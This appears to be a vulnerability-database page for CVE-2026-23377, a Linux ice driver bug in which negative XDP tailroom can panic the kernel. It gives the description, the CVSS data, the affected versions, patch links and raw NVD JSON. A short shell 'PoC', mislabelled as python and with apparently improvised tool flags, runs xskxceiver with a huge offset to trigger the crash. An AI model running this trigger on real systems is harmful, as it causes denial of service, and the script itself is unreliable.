CVE-2026-23377

Description

In the Linux kernel, the following vulnerability has been resolved: ice: change XDP RxQ frag_size from DMA write length to xdp.frame_sz The only user of frag_size field in XDP RxQ info is bpf_xdp_frags_increase_tail(). It clearly expects whole buff size instead of DMA write size. Different assumptions in ice driver configuration lead to negative tailroom. This allows to trigger kernel panic, when using XDP_ADJUST_TAIL_GROW_MULTI_BUFF xskxceiver test and changing packet size to 6912 and the requested offset to a huge value, e.g. XSK_UMEM__MAX_FRAME_SIZE * 100. Due to other quirks of the ZC configuration in ice, panic is not observed in ZC mode, but tailroom growing still fails when it should not. Use fill queue buffer truesize instead of DMA write size in XDP RxQ info. Fix ZC mode too by using the new helper.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE

Linux Kernel (ice driver module)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC trigger for CVE-2026-23377
# Requires xskxceiver tool and configured interface

INTERFACE="eth0"
PACKET_SIZE=6912
OFFSET=$((9728 * 100)) # XSK_UMEM__MAX_FRAME_SIZE * 100

# Execute the test case that triggers negative tailroom calculation
./xskxceiver -i $INTERFACE \
              -t XDP_ADJUST_TAIL_GROW_MULTI_BUFF \
              -p $PACKET_SIZE \
              -o $OFFSET

# Note: This attempts to grow the tail with a massive offset,
# triggering the calculation error in the ice driver.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23377
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23377
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23377/
[4] VulDB https://vuldb.com/cve/CVE-2026-23377
[5] https://git.kernel.org/stable/c/b0f05100e8795aadd1c0606bae9caefbda070d63
[6] https://git.kernel.org/stable/c/e142dc4ef0f451b7ef99d09aaa84e9389af629d7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23377", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:37.520", "lastModified": "2026-04-28T18:48:58.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: change XDP RxQ frag_size from DMA write length to xdp.frame_sz\n\nThe only user of frag_size field in XDP RxQ info is\nbpf_xdp_frags_increase_tail(). It clearly expects whole buff size instead\nof DMA write size. Different assumptions in ice driver configuration lead\nto negative tailroom.\n\nThis allows to trigger kernel panic, when using\nXDP_ADJUST_TAIL_GROW_MULTI_BUFF xskxceiver test and changing packet size to\n6912 and the requested offset to a huge value, e.g.\nXSK_UMEM__MAX_FRAME_SIZE * 100.\n\nDue to other quirks of the ZC configuration in ice, panic is not observed\nin ZC mode, but tailroom growing still fails when it should not.\n\nUse fill queue buffer truesize instead of DMA write size in XDP RxQ info.\nFix ZC mode too by using the new helper."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nice: cambiar frag_size de XDP RxQ de la longitud de escritura DMA a xdp.frame_sz\n\nEl único usuario del campo frag_size en la información de XDP RxQ es bpf_xdp_frags_increase_tail(). Claramente espera el tamaño completo del búfer en lugar del tamaño de escritura DMA. Diferentes suposiciones en la configuración del controlador ice llevan a un tailroom negativo.\n\nEsto permite activar un pánico del kernel, al usar la prueba xskxceiver XDP_ADJUST_TAIL_GROW_MULTI_BUFF y cambiar el tamaño del paquete a 6912 y el desplazamiento solicitado a un valor enorme, por ejemplo, XSK_UMEM__MAX_FRAME_SIZE * 100.\n\nDebido a otras peculiaridades de la configuración ZC en ice, no se observa pánico en modo ZC, pero el crecimiento del tailroom sigue fallando cuando no debería.\n\nUsar el tamaño real del búfer de la cola de llenado en lugar del tamaño de escritura DMA en la información de XDP RxQ. Corregir el modo ZC también usando la nueva función auxiliar."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.19.7", "matchCriteriaId": "773D6612-E903-45AF-AD3C-5A967BCBBB1E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/b0f05100e8795aadd1c0606bae9caefbda070d63", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e142dc4ef0f451b7ef99d09aaa84e9389af629d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}